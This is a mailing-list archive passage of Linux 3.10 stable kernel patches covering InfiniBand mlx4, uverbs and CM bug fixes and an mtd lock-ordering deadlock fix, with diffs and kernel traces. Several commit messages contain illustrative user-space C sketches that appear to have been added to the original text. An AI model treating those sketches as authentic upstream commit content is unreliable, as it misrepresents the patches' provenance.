@@ -558,8 +558,8 @@ static void mlx4_ib_mcg_timeout_handler(struct work_struct *work)
 		} else
 			mcg_warn_group(group, "DRIVER BUG\n");
 	} else if (group->state == MCAST_LEAVE_SENT) {
-		if (group->rec.scope_join_state & 7)
-			group->rec.scope_join_state &= 0xf8;
+		if (group->rec.scope_join_state & 0xf)
+			group->rec.scope_join_state &= 0xf0;
 		group->state = MCAST_IDLE;
 		mutex_unlock(&group->lock);
 		if (release_group(group, 1))
@@ -599,7 +599,7 @@ static int handle_leave_req(struct mcast_group *group, u8 leave_mask,
 static int handle_join_req(struct mcast_group *group, u8 join_mask,
 			   struct mcast_req *req)
 {
-	u8 group_join_state = group->rec.scope_join_state & 7;
+	u8 group_join_state = group->rec.scope_join_state & 0xf;
 	int ref = 0;
 	u16 status;
 	struct ib_sa_mcmember_data *sa_data = (struct ib_sa_mcmember_data *)req->sa_mad.data;
@@ -684,8 +684,8 @@ static void mlx4_ib_mcg_work_handler(struct work_struct *work)
 			u8 cur_join_state;
 
 			resp_join_state = ((struct ib_sa_mcmember_data *)
-						group->response_sa_mad.data)->scope_join_state & 7;
-			cur_join_state = group->rec.scope_join_state & 7;
+						group->response_sa_mad.data)->scope_join_state & 0xf;
+			cur_join_state = group->rec.scope_join_state & 0xf;
 
 			if (method == IB_MGMT_METHOD_GET_RESP) {
 				/* successfull join */
@@ -704,7 +704,7 @@ process_requests:
 		req = list_first_entry(&group->pending_list, struct mcast_req,
 				       group_list);
 		sa_data = (struct ib_sa_mcmember_data *)req->sa_mad.data;
-		req_join_state = sa_data->scope_join_state & 0x7;
+		req_join_state = sa_data->scope_join_state & 0xf;
 
 		/* For a leave request, we will immediately answer the VF, and
 		 * update our internal counters. The actual leave will be sent
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 204/319] IB/mlx4: Fix create CQ error flow
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (102 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 203/319] IB/mlx4: Fix incorrect MC join state bit-masking on SR-IOV Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 205/319] IB/uverbs: Fix leak of XRC target QPs Willy Tarreau
                   ` (114 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Matan Barak, Daniel Jurgens, Leon Romanovsky, Doug Ledford,
	Willy Tarreau

From: Matan Barak <matanb@mellanox.com>

commit 593ff73bcfdc79f79a8a0df55504f75ad3e5d1a9 upstream.

Currently, if ib_copy_to_udata fails, the CQ
won't be deleted from the radix tree and the HW (HW2SW).
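
The unwinding order can be sketched as a goto ladder in user-space C.
The toy_cq type and the fail_* switches are hypothetical; two flags
stand in for the doorbell mapping and the hardware CQ.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical resource flags for the doorbell map and the CQ itself. */
struct toy_cq {
	int db_mapped;
	int hw_allocated;
};

/*
 * Set up @cq. @fail_alloc and @fail_copy simulate a failure of the
 * allocation step and of the final copy to userspace. Returns 0 on
 * success, or -1 after undoing every step that had completed.
 */
static int toy_create_cq(struct toy_cq *cq, int fail_alloc, int fail_copy)
{
	assert(cq != NULL);

	cq->db_mapped = 1;		/* step 1: map the doorbell */
	if (fail_alloc)
		goto err_dbmap;

	cq->hw_allocated = 1;		/* step 2: allocate the CQ */
	if (fail_copy)			/* step 3: report the CQ number */
		goto err_cq_free;

	return 0;

err_cq_free:
	cq->hw_allocated = 0;		/* undo step 2 */
err_dbmap:
	cq->db_mapped = 0;		/* undo step 1 */
	return -1;
}
```

Each label undoes one step and falls through to the labels for the
earlier steps, so a failure in the last step must jump to the first
label rather than into the middle of the ladder.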

Fixes: 225c7b1feef1 ('IB/mlx4: Add a driver Mellanox ConnectX InfiniBand adapters')
Signed-off-by: Matan Barak <matanb@mellanox.com>
Signed-off-by: Daniel Jurgens <danielj@mellanox.com>
Reviewed-by: Mark Bloch <markb@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/hw/mlx4/cq.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/infiniband/hw/mlx4/cq.c b/drivers/infiniband/hw/mlx4/cq.c
index d5e60f4..5b8a62c 100644
--- a/drivers/infiniband/hw/mlx4/cq.c
+++ b/drivers/infiniband/hw/mlx4/cq.c
@@ -239,11 +239,14 @@ struct ib_cq *mlx4_ib_create_cq(struct ib_device *ibdev, int entries, int vector
 	if (context)
 		if (ib_copy_to_udata(udata, &cq->mcq.cqn, sizeof (__u32))) {
 			err = -EFAULT;
-			goto err_dbmap;
+			goto err_cq_free;
 		}
 
 	return &cq->ibcq;
 
+err_cq_free:
+	mlx4_cq_free(dev->dev, &cq->mcq);
+
 err_dbmap:
 	if (context)
 		mlx4_ib_db_unmap_user(to_mucontext(context), &cq->db);
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 205/319] IB/uverbs: Fix leak of XRC target QPs
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (103 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 204/319] IB/mlx4: Fix create CQ error flow Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 206/319] IB/cm: Mark stale CM id's whenever the mad agent was unregistered Willy Tarreau
                   ` (113 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Tariq Toukan, Noa Osherovich, Leon Romanovsky, Doug Ledford,
	Willy Tarreau

From: Tariq Toukan <tariqt@mellanox.com>

commit 5b810a242c28e1d8d64d718cebe75b79d86a0b2d upstream.

The real QP is destroyed when the ref count reaches zero, but for XRC
target QPs this call was missed, which caused QP leaks.

Call destroy for all flows.

Fixes: 0e0ec7e0638e ('RDMA/core: Export ib_open_qp() to share XRC...')
Signed-off-by: Tariq Toukan <tariqt@mellanox.com>
Signed-off-by: Noa Osherovich <noaos@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/core/uverbs_main.c | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/drivers/infiniband/core/uverbs_main.c b/drivers/infiniband/core/uverbs_main.c
index f50623d..37b7207 100644
--- a/drivers/infiniband/core/uverbs_main.c
+++ b/drivers/infiniband/core/uverbs_main.c
@@ -224,12 +224,9 @@ static int ib_uverbs_cleanup_ucontext(struct ib_uverbs_file *file,
 			container_of(uobj, struct ib_uqp_object, uevent.uobject);
 
 		idr_remove_uobj(&ib_uverbs_qp_idr, uobj);
-		if (qp != qp->real_qp) {
-			ib_close_qp(qp);
-		} else {
+		if (qp == qp->real_qp)
 			ib_uverbs_detach_umcast(qp, uqp);
-			ib_destroy_qp(qp);
-		}
+		ib_destroy_qp(qp);
 		ib_uverbs_release_uevent(file, &uqp->uevent);
 		kfree(uqp);
 	}
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 206/319] IB/cm: Mark stale CM id's whenever the mad agent was unregistered
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (104 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 205/319] IB/uverbs: Fix leak of XRC target QPs Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 207/319] mtd: blkdevs: fix potential deadlock + lockdep warnings Willy Tarreau
                   ` (112 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mark Bloch, Erez Shitrit, Leon Romanovsky, Doug Ledford, Willy Tarreau

From: Mark Bloch <markb@mellanox.com>

commit 9db0ff53cb9b43ed75bacd42a89c1a0ab048b2b0 upstream.

When a CM id object has a port assigned to it, it means that the cm-id
asked to go through that specific port, but if that port was removed
(hot-unplug event) the cm-id was not updated.
To fix that, the port keeps a list of all the cm-ids that are planning
to go through it; whenever the port is removed, it marks all of them as
invalid.
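
The bookkeeping described above can be sketched in user-space C. The
toy_* types are hypothetical, a singly linked list replaces the
kernel's list_head, and the locking is omitted.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical CM id that remembers which port it sends through. */
struct toy_cm_id {
	struct toy_cm_id *next;		/* link in the owning port's list */
	int send_port_not_ready;	/* set once the port has gone away */
};

struct toy_port {
	struct toy_cm_id *ids;	/* every CM id planning to use this port */
};

static void toy_port_attach(struct toy_port *port, struct toy_cm_id *id)
{
	id->send_port_not_ready = 0;
	id->next = port->ids;
	port->ids = id;
}

/* On port removal, mark every attached CM id stale and empty the list. */
static void toy_port_remove(struct toy_port *port)
{
	struct toy_cm_id *id = port->ids;

	while (id) {
		struct toy_cm_id *next = id->next;

		id->send_port_not_ready = 1;
		id->next = NULL;
		id = next;
	}
	port->ids = NULL;
}

/* Senders check the flag before touching the port; -1 models -ENODEV. */
static int toy_alloc_msg(const struct toy_cm_id *id)
{
	assert(id != NULL);
	return id->send_port_not_ready ? -1 : 0;
}
```

After the port is removed, a sender sees the stale flag and bails out
instead of dereferencing state that belonged to the departed port.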

This commit fixes a kernel panic which happens when running traffic
between guests and force-rebooting a guest mid-traffic:

 Call Trace:
  [<ffffffff815271fa>] ? panic+0xa7/0x16f
  [<ffffffff8152b534>] ? oops_end+0xe4/0x100
  [<ffffffff8104a00b>] ? no_context+0xfb/0x260
  [<ffffffff81084db2>] ? del_timer_sync+0x22/0x30
  [<ffffffff8104a295>] ? __bad_area_nosemaphore+0x125/0x1e0
  [<ffffffff81084240>] ? process_timeout+0x0/0x10
  [<ffffffff8104a363>] ? bad_area_nosemaphore+0x13/0x20
  [<ffffffff8104aabf>] ? __do_page_fault+0x31f/0x480
  [<ffffffff81065df0>] ? default_wake_function+0x0/0x20
  [<ffffffffa0752675>] ? free_msg+0x55/0x70 [mlx5_core]
  [<ffffffffa0753434>] ? cmd_exec+0x124/0x840 [mlx5_core]
  [<ffffffff8105a924>] ? find_busiest_group+0x244/0x9f0
  [<ffffffff8152d45e>] ? do_page_fault+0x3e/0xa0
  [<ffffffff8152a815>] ? page_fault+0x25/0x30
  [<ffffffffa024da25>] ? cm_alloc_msg+0x35/0xc0 [ib_cm]
  [<ffffffffa024e821>] ? ib_send_cm_dreq+0xb1/0x1e0 [ib_cm]
  [<ffffffffa024f836>] ? cm_destroy_id+0x176/0x320 [ib_cm]
  [<ffffffffa024fb00>] ? ib_destroy_cm_id+0x10/0x20 [ib_cm]
  [<ffffffffa034f527>] ? ipoib_cm_free_rx_reap_list+0xa7/0x110 [ib_ipoib]
  [<ffffffffa034f590>] ? ipoib_cm_rx_reap+0x0/0x20 [ib_ipoib]
  [<ffffffffa034f5a5>] ? ipoib_cm_rx_reap+0x15/0x20 [ib_ipoib]
  [<ffffffff81094d20>] ? worker_thread+0x170/0x2a0
  [<ffffffff8109b2a0>] ? autoremove_wake_function+0x0/0x40
  [<ffffffff81094bb0>] ? worker_thread+0x0/0x2a0
  [<ffffffff8109aef6>] ? kthread+0x96/0xa0
  [<ffffffff8100c20a>] ? child_rip+0xa/0x20
  [<ffffffff8109ae60>] ? kthread+0x0/0xa0
  [<ffffffff8100c200>] ? child_rip+0x0/0x20

Fixes: a977049dacde ("[PATCH] IB: Add the kernel CM implementation")
Signed-off-by: Mark Bloch <markb@mellanox.com>
Signed-off-by: Erez Shitrit <erezsh@mellanox.com>
Reviewed-by: Maor Gottlieb <maorg@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/core/cm.c | 127 +++++++++++++++++++++++++++++++++++++------
 1 file changed, 111 insertions(+), 16 deletions(-)

diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
index c410217..951a4f6 100644
--- a/drivers/infiniband/core/cm.c
+++ b/drivers/infiniband/core/cm.c
@@ -79,6 +79,8 @@ static struct ib_cm {
 	__be32 random_id_operand;
 	struct list_head timewait_list;
 	struct workqueue_struct *wq;
+	/* Sync on cm change port state */
+	spinlock_t state_lock;
 } cm;
 
 /* Counter indexes ordered by attribute ID */
@@ -160,6 +162,8 @@ struct cm_port {
 	struct ib_mad_agent *mad_agent;
 	struct kobject port_obj;
 	u8 port_num;
+	struct list_head cm_priv_prim_list;
+	struct list_head cm_priv_altr_list;
 	struct cm_counter_group counter_group[CM_COUNTER_GROUPS];
 };
 
@@ -237,6 +241,12 @@ struct cm_id_private {
 	u8 service_timeout;
 	u8 target_ack_delay;
 
+	struct list_head prim_list;
+	struct list_head altr_list;
+	/* Indicates that the send port mad is registered and av is set */
+	int prim_send_port_not_ready;
+	int altr_send_port_not_ready;
+
 	struct list_head work_list;
 	atomic_t work_count;
 };
@@ -255,19 +265,46 @@ static int cm_alloc_msg(struct cm_id_private *cm_id_priv,
 	struct ib_mad_agent *mad_agent;
 	struct ib_mad_send_buf *m;
 	struct ib_ah *ah;
+	struct cm_av *av;
+	unsigned long flags, flags2;
+	int ret = 0;
 
+	/* don't let the port to be released till the agent is down */
+	spin_lock_irqsave(&cm.state_lock, flags2);
+	spin_lock_irqsave(&cm.lock, flags);
+	if (!cm_id_priv->prim_send_port_not_ready)
+		av = &cm_id_priv->av;
+	else if (!cm_id_priv->altr_send_port_not_ready &&
+		 (cm_id_priv->alt_av.port))
+		av = &cm_id_priv->alt_av;
+	else {
+		pr_info("%s: not valid CM id\n", __func__);
+		ret = -ENODEV;
+		spin_unlock_irqrestore(&cm.lock, flags);
+		goto out;
+	}
+	spin_unlock_irqrestore(&cm.lock, flags);
+	/* Make sure the port haven't released the mad yet */
 	mad_agent = cm_id_priv->av.port->mad_agent;
-	ah = ib_create_ah(mad_agent->qp->pd, &cm_id_priv->av.ah_attr);
-	if (IS_ERR(ah))
-		return PTR_ERR(ah);
+	if (!mad_agent) {
+		pr_info("%s: not a valid MAD agent\n", __func__);
+		ret = -ENODEV;
+		goto out;
+	}
+	ah = ib_create_ah(mad_agent->qp->pd, &av->ah_attr);
+	if (IS_ERR(ah)) {
+		ret = PTR_ERR(ah);
+		goto out;
+	}
 
 	m = ib_create_send_mad(mad_agent, cm_id_priv->id.remote_cm_qpn,
-			       cm_id_priv->av.pkey_index,
+			       av->pkey_index,
 			       0, IB_MGMT_MAD_HDR, IB_MGMT_MAD_DATA,
 			       GFP_ATOMIC);
 	if (IS_ERR(m)) {
 		ib_destroy_ah(ah);
-		return PTR_ERR(m);
+		ret = PTR_ERR(m);
+		goto out;
 	}
 
 	/* Timeout set by caller if response is expected. */
@@ -277,7 +314,10 @@ static int cm_alloc_msg(struct cm_id_private *cm_id_priv,
 	atomic_inc(&cm_id_priv->refcount);
 	m->context[0] = cm_id_priv;
 	*msg = m;
-	return 0;
+
+out:
+	spin_unlock_irqrestore(&cm.state_lock, flags2);
+	return ret;
 }
 
 static int cm_alloc_response_msg(struct cm_port *port,
@@ -346,7 +386,8 @@ static void cm_init_av_for_response(struct cm_port *port, struct ib_wc *wc,
 			   grh, &av->ah_attr);
 }
 
-static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av)
+static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av,
+			      struct cm_id_private *cm_id_priv)
 {
 	struct cm_device *cm_dev;
 	struct cm_port *port = NULL;
@@ -376,7 +417,18 @@ static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av)
 	ib_init_ah_from_path(cm_dev->ib_device, port->port_num, path,
 			     &av->ah_attr);
 	av->timeout = path->packet_life_time + 1;
-	return 0;
+
+	spin_lock_irqsave(&cm.lock, flags);
+	if (&cm_id_priv->av == av)
+		list_add_tail(&cm_id_priv->prim_list, &port->cm_priv_prim_list);
+	else if (&cm_id_priv->alt_av == av)
+		list_add_tail(&cm_id_priv->altr_list, &port->cm_priv_altr_list);
+	else
+		ret = -EINVAL;
+
+	spin_unlock_irqrestore(&cm.lock, flags);
+
+	return ret;
 }
 
 static int cm_alloc_id(struct cm_id_private *cm_id_priv)
@@ -716,6 +768,8 @@ struct ib_cm_id *ib_create_cm_id(struct ib_device *device,
 	spin_lock_init(&cm_id_priv->lock);
 	init_completion(&cm_id_priv->comp);
 	INIT_LIST_HEAD(&cm_id_priv->work_list);
+	INIT_LIST_HEAD(&cm_id_priv->prim_list);
+	INIT_LIST_HEAD(&cm_id_priv->altr_list);
 	atomic_set(&cm_id_priv->work_count, -1);
 	atomic_set(&cm_id_priv->refcount, 1);
 	return &cm_id_priv->id;
@@ -914,6 +968,15 @@ retest:
 		break;
 	}
 
+	spin_lock_irq(&cm.lock);
+	if (!list_empty(&cm_id_priv->altr_list) &&
+	    (!cm_id_priv->altr_send_port_not_ready))
+		list_del(&cm_id_priv->altr_list);
+	if (!list_empty(&cm_id_priv->prim_list) &&
+	    (!cm_id_priv->prim_send_port_not_ready))
+		list_del(&cm_id_priv->prim_list);
+	spin_unlock_irq(&cm.lock);
+
 	cm_free_id(cm_id->local_id);
 	cm_deref_id(cm_id_priv);
 	wait_for_completion(&cm_id_priv->comp);
@@ -1137,12 +1200,13 @@ int ib_send_cm_req(struct ib_cm_id *cm_id,
 		goto out;
 	}
 
-	ret = cm_init_av_by_path(param->primary_path, &cm_id_priv->av);
+	ret = cm_init_av_by_path(param->primary_path, &cm_id_priv->av,
+				 cm_id_priv);
 	if (ret)
 		goto error1;
 	if (param->alternate_path) {
 		ret = cm_init_av_by_path(param->alternate_path,
-					 &cm_id_priv->alt_av);
+					 &cm_id_priv->alt_av, cm_id_priv);
 		if (ret)
 			goto error1;
 	}
@@ -1562,7 +1626,8 @@ static int cm_req_handler(struct cm_work *work)
 
 	cm_process_routed_req(req_msg, work->mad_recv_wc->wc);
 	cm_format_paths_from_req(req_msg, &work->path[0], &work->path[1]);
-	ret = cm_init_av_by_path(&work->path[0], &cm_id_priv->av);
+	ret = cm_init_av_by_path(&work->path[0], &cm_id_priv->av,
+				 cm_id_priv);
 	if (ret) {
 		ib_get_cached_gid(work->port->cm_dev->ib_device,
 				  work->port->port_num, 0, &work->path[0].sgid);
@@ -1572,7 +1637,8 @@ static int cm_req_handler(struct cm_work *work)
 		goto rejected;
 	}
 	if (req_msg->alt_local_lid) {
-		ret = cm_init_av_by_path(&work->path[1], &cm_id_priv->alt_av);
+		ret = cm_init_av_by_path(&work->path[1], &cm_id_priv->alt_av,
+					 cm_id_priv);
 		if (ret) {
 			ib_send_cm_rej(cm_id, IB_CM_REJ_INVALID_ALT_GID,
 				       &work->path[0].sgid,
@@ -2627,7 +2693,8 @@ int ib_send_cm_lap(struct ib_cm_id *cm_id,
 		goto out;
 	}
 
-	ret = cm_init_av_by_path(alternate_path, &cm_id_priv->alt_av);
+	ret = cm_init_av_by_path(alternate_path, &cm_id_priv->alt_av,
+				 cm_id_priv);
 	if (ret)
 		goto out;
 	cm_id_priv->alt_av.timeout =
@@ -2739,7 +2806,8 @@ static int cm_lap_handler(struct cm_work *work)
 	cm_init_av_for_response(work->port, work->mad_recv_wc->wc,
 				work->mad_recv_wc->recv_buf.grh,
 				&cm_id_priv->av);
-	cm_init_av_by_path(param->alternate_path, &cm_id_priv->alt_av);
+	cm_init_av_by_path(param->alternate_path, &cm_id_priv->alt_av,
+			   cm_id_priv);
 	ret = atomic_inc_and_test(&cm_id_priv->work_count);
 	if (!ret)
 		list_add_tail(&work->list, &cm_id_priv->work_list);
@@ -2931,7 +2999,7 @@ int ib_send_cm_sidr_req(struct ib_cm_id *cm_id,
 		return -EINVAL;
 
 	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
-	ret = cm_init_av_by_path(param->path, &cm_id_priv->av);
+	ret = cm_init_av_by_path(param->path, &cm_id_priv->av, cm_id_priv);
 	if (ret)
 		goto out;
 
@@ -3352,7 +3420,9 @@ out:
 static int cm_migrate(struct ib_cm_id *cm_id)
 {
 	struct cm_id_private *cm_id_priv;
+	struct cm_av tmp_av;
 	unsigned long flags;
+	int tmp_send_port_not_ready;
 	int ret = 0;
 
 	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
@@ -3361,7 +3431,14 @@ static int cm_migrate(struct ib_cm_id *cm_id)
 	    (cm_id->lap_state == IB_CM_LAP_UNINIT ||
 	     cm_id->lap_state == IB_CM_LAP_IDLE)) {
 		cm_id->lap_state = IB_CM_LAP_IDLE;
+		/* Swap address vector */
+		tmp_av = cm_id_priv->av;
 		cm_id_priv->av = cm_id_priv->alt_av;
+		cm_id_priv->alt_av = tmp_av;
+		/* Swap port send ready state */
+		tmp_send_port_not_ready = cm_id_priv->prim_send_port_not_ready;
+		cm_id_priv->prim_send_port_not_ready = cm_id_priv->altr_send_port_not_ready;
+		cm_id_priv->altr_send_port_not_ready = tmp_send_port_not_ready;
 	} else
 		ret = -EINVAL;
 	spin_unlock_irqrestore(&cm_id_priv->lock, flags);
@@ -3767,6 +3844,9 @@ static void cm_add_one(struct ib_device *ib_device)
 		port->cm_dev = cm_dev;
 		port->port_num = i;
 
+		INIT_LIST_HEAD(&port->cm_priv_prim_list);
+		INIT_LIST_HEAD(&port->cm_priv_altr_list);
+
 		ret = cm_create_port_fs(port);
 		if (ret)
 			goto error1;
@@ -3813,6 +3893,8 @@ static void cm_remove_one(struct ib_device *ib_device)
 {
 	struct cm_device *cm_dev;
 	struct cm_port *port;
+	struct cm_id_private *cm_id_priv;
+	struct ib_mad_agent *cur_mad_agent;
 	struct ib_port_modify port_modify = {
 		.clr_port_cap_mask = IB_PORT_CM_SUP
 	};
@@ -3830,10 +3912,22 @@ static void cm_remove_one(struct ib_device *ib_device)
 	for (i = 1; i <= ib_device->phys_port_cnt; i++) {
 		port = cm_dev->port[i-1];
 		ib_modify_port(ib_device, port->port_num, 0, &port_modify);
-		ib_unregister_mad_agent(port->mad_agent);
+		/* Mark all the cm_id's as not valid */
+		spin_lock_irq(&cm.lock);
+		list_for_each_entry(cm_id_priv, &port->cm_priv_altr_list, altr_list)
+			cm_id_priv->altr_send_port_not_ready = 1;
+		list_for_each_entry(cm_id_priv, &port->cm_priv_prim_list, prim_list)
+			cm_id_priv->prim_send_port_not_ready = 1;
+		spin_unlock_irq(&cm.lock);
 		flush_workqueue(cm.wq);
+		spin_lock_irq(&cm.state_lock);
+		cur_mad_agent = port->mad_agent;
+		port->mad_agent = NULL;
+		spin_unlock_irq(&cm.state_lock);
+		ib_unregister_mad_agent(cur_mad_agent);
 		cm_remove_port_fs(port);
 	}
+
 	device_unregister(cm_dev->device);
 	kfree(cm_dev);
 }
@@ -3846,6 +3940,7 @@ static int __init ib_cm_init(void)
 	INIT_LIST_HEAD(&cm.device_list);
 	rwlock_init(&cm.device_lock);
 	spin_lock_init(&cm.lock);
+	spin_lock_init(&cm.state_lock);
 	cm.listen_service_table = RB_ROOT;
 	cm.listen_service_id = be64_to_cpu(IB_CM_ASSIGN_SERVICE_ID);
 	cm.remote_id_table = RB_ROOT;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 207/319] mtd: blkdevs: fix potential deadlock + lockdep warnings
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (105 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 206/319] IB/cm: Mark stale CM id's whenever the mad agent was unregistered Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 208/319] mtd: pmcmsp-flash: Allocating too much in init_msp_flash() Willy Tarreau
                   ` (111 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Brian Norris, Willy Tarreau

From: Brian Norris <computersforpeace@gmail.com>

commit f3c63795e90f0c6238306883b6c72f14d5355721 upstream.

Commit 073db4a51ee4 ("mtd: fix: avoid race condition when accessing
mtd->usecount") fixed a race condition but due to poor ordering of the
mutex acquisition, introduced a potential deadlock.

The deadlock can occur, for example, when rmmod'ing the m25p80 module, which
will delete one or more MTDs, along with any corresponding mtdblock
devices. This could potentially race with an acquisition of the block
device as follows.

 -> blktrans_open()
    ->  mutex_lock(&dev->lock);
    ->  mutex_lock(&mtd_table_mutex);

 -> del_mtd_device()
    ->  mutex_lock(&mtd_table_mutex);
    ->  blktrans_notify_remove() -> del_mtd_blktrans_dev()
       ->  mutex_lock(&dev->lock);

This is a classic (potential) ABBA deadlock, which can be fixed by
making the A->B ordering consistent everywhere. There was no real
purpose to the ordering in the original patch, AFAIR, so this shouldn't
be a problem. This ordering was actually already present in
del_mtd_blktrans_dev(), for one, where the function tried to ensure that
its caller already held mtd_table_mutex before it acquired &dev->lock:

        if (mutex_trylock(&mtd_table_mutex)) {
                mutex_unlock(&mtd_table_mutex);
                BUG();
        }

So, reverse the ordering of acquisition of &dev->lock and &mtd_table_mutex so
we always acquire mtd_table_mutex first.
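
As a userspace illustration of the consistent ordering (a minimal sketch
only, not the kernel code: the pthread mutexes table_mutex and dev_lock and
the functions open_path(), remove_path() and run_both_paths() are
hypothetical stand-ins for mtd_table_mutex, &dev->lock and the two call
paths above), both paths take the outer lock first, so neither can hold one
lock while waiting for the other in the opposite order:

```c
#include <pthread.h>

#define ITERATIONS 100000

/* Hypothetical stand-ins for mtd_table_mutex and dev->lock. */
static pthread_mutex_t table_mutex = PTHREAD_MUTEX_INITIALIZER;
static pthread_mutex_t dev_lock = PTHREAD_MUTEX_INITIALIZER;
static long open_count;

/* "Open" path: table lock first, then the per-device lock. */
static void *open_path(void *unused)
{
	int i;

	(void)unused;
	for (i = 0; i < ITERATIONS; i++) {
		pthread_mutex_lock(&table_mutex);
		pthread_mutex_lock(&dev_lock);
		open_count++;
		pthread_mutex_unlock(&dev_lock);
		pthread_mutex_unlock(&table_mutex);
	}
	return NULL;
}

/* "Remove" path: same A->B order, so no ABBA cycle is possible. */
static void *remove_path(void *unused)
{
	int i;

	(void)unused;
	for (i = 0; i < ITERATIONS; i++) {
		pthread_mutex_lock(&table_mutex);
		pthread_mutex_lock(&dev_lock);
		open_count--;
		pthread_mutex_unlock(&dev_lock);
		pthread_mutex_unlock(&table_mutex);
	}
	return NULL;
}

/* Runs both paths concurrently; returns the final count, or -1 on error. */
static long run_both_paths(void)
{
	pthread_t opener, remover;

	open_count = 0;
	if (pthread_create(&opener, NULL, open_path, NULL))
		return -1;
	if (pthread_create(&remover, NULL, remove_path, NULL)) {
		pthread_join(opener, NULL);
		return -1;
	}
	pthread_join(opener, NULL);
	pthread_join(remover, NULL);
	return open_count;
}
```

Swapping the two lock calls in only one of the paths would recreate the
inversion that lockdep reports below.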

Snippets of the lockdep output follow:

  # modprobe -r m25p80
  [   53.419251]
  [   53.420838] ======================================================
  [   53.427300] [ INFO: possible circular locking dependency detected ]
  [   53.433865] 4.3.0-rc6 #96 Not tainted
  [   53.437686] -------------------------------------------------------
  [   53.444220] modprobe/372 is trying to acquire lock:
  [   53.449320]  (&new->lock){+.+...}, at: [<c043fe4c>] del_mtd_blktrans_dev+0x80/0xdc
  [   53.457271]
  [   53.457271] but task is already holding lock:
  [   53.463372]  (mtd_table_mutex){+.+.+.}, at: [<c0439994>] del_mtd_device+0x18/0x100
  [   53.471321]
  [   53.471321] which lock already depends on the new lock.
  [   53.471321]
  [   53.479856]
  [   53.479856] the existing dependency chain (in reverse order) is:
  [   53.487660]
  -> #1 (mtd_table_mutex){+.+.+.}:
  [   53.492331]        [<c043fc5c>] blktrans_open+0x34/0x1a4
  [   53.497879]        [<c01afce0>] __blkdev_get+0xc4/0x3b0
  [   53.503364]        [<c01b0bb8>] blkdev_get+0x108/0x320
  [   53.508743]        [<c01713c0>] do_dentry_open+0x218/0x314
  [   53.514496]        [<c0180454>] path_openat+0x4c0/0xf9c
  [   53.519959]        [<c0182044>] do_filp_open+0x5c/0xc0
  [   53.525336]        [<c0172758>] do_sys_open+0xfc/0x1cc
  [   53.530716]        [<c000f740>] ret_fast_syscall+0x0/0x1c
  [   53.536375]
  -> #0 (&new->lock){+.+...}:
  [   53.540587]        [<c063f124>] mutex_lock_nested+0x38/0x3cc
  [   53.546504]        [<c043fe4c>] del_mtd_blktrans_dev+0x80/0xdc
  [   53.552606]        [<c043f164>] blktrans_notify_remove+0x7c/0x84
  [   53.558891]        [<c04399f0>] del_mtd_device+0x74/0x100
  [   53.564544]        [<c043c670>] del_mtd_partitions+0x80/0xc8
  [   53.570451]        [<c0439aa0>] mtd_device_unregister+0x24/0x48
  [   53.576637]        [<c046ce6c>] spi_drv_remove+0x1c/0x34
  [   53.582207]        [<c03de0f0>] __device_release_driver+0x88/0x114
  [   53.588663]        [<c03de19c>] device_release_driver+0x20/0x2c
  [   53.594843]        [<c03dd9e8>] bus_remove_device+0xd8/0x108
  [   53.600748]        [<c03dacc0>] device_del+0x10c/0x210
  [   53.606127]        [<c03dadd0>] device_unregister+0xc/0x20
  [   53.611849]        [<c046d878>] __unregister+0x10/0x20
